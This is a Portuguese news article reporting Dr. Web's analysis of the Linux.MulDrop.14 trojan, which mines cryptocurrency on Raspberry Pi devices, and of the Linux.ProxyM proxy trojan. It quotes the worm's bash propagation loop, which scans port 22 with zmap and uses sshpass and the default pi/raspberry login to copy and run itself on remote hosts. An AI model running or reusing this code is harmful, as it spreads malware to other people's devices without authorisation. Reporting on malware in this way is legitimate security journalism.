Malware Linux foca em equipamentos Raspberry Pi para mineração de CryptoCurrency

PorDiego Boot em 23/06/2017

No site iMasters.

Computer Business Review

Pesquisadores de malware do fabricante de antivírus russo Dr. Web descobriram um novo Trojan para Linux, rastreado como KinuX.MulDrop.14, que está infectando dispositivos Raspberry Pi com a finalidade de minerar cryptocurrency. De acordo com a Dr. Web, o malware foi visto pela primeira vez online em maio; os pesquisadores descobriram um script contendo um aplicação compactada e criptografada.

O malware KinuX.MulDrop.14 tem como alvo dispositivos Raspberry Pi não protegidos que possuem portas SSH abertas para conexões externas.

Uma vez que o malware infecta o dispositivo, ele irá primeiro alterar a senha da conta “pi” para:

1	\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1

Em seguida, o malware desliga vários processos e instala bibliotecas como ZMap e SSHPass que ele usa para suas operações.

“O Trojan Linux que é um script bash contendo um programa de mineração, que é compactado com gzip e criptografado com base64. Uma vez iniciado, o script encerra vários processos e instala bibliotecas necessárias para sua operação”, afirmou a análise publicada pela Dr Web.

Ele muda a senha do usuário “pi” para “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”

O malware, em seguida, inicia um processo de mineração cryptocurrency, mas usa o ZMap para digitalizar a Internet para infectar outros dispositivos.

Toda vez que o malware encontra um dispositivo de Raspberry Pi na Internet, ele usa o sshpass para tentar fazer logon usando o nome de usuário padrão “pi” e a senha “raspiberry”.

O código malicioso só tenta usar esse par de valores. Isso sugere que o malware alveja apenas dispositivos Raspberry Pi. Especialistas acreditam que o malware poderia ser melhorado e que pode ser usado nas próximas semanas para atingir outras plataformas.

Abaixo vemos parte do código compartilhado pela Dr. Web:

1	NAME=`mktemp -u 'XXXXXXXX'`

2	while [ true ]; do

3	FILE=`mktemp`

4	zmap -p 22 -o $FILE -n 100000

5	killall ssh scp

6	for IP in `cat $FILE`

7

do

8

sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &

9

done

10	rm -rf $FILE

11

sleep 10

12

done

Os pesquisadores também analisaram um segundo malware para Linux, apelidado de Linux.ProxyM que foi usado para criar uma rede proxy.

O código malicioso inicia um servidor proxy SOCKS em dispositivos infectados usados para retransmitir o tráfego malicioso, disfarçando sua real fonte.

“O outro Trojan foi nomeado de Linux.ProxyM. ataques envolvendo este trojan foram observados desde Fevereiro de 2017, mas atingiram o pico no final de Maio. O gráfico abaixo mostra quantos ataques foram feitas pelo Linux.ProxyM e identificados pelos especialistas da Doctor Web”, afirmou a Dr. Web.

De acordo com a Dr. Web, o número de dispositivos infectados com o Linux.ProxyM atingiu 10 mil unidades desde a sua descoberta em fevereiro de 2017.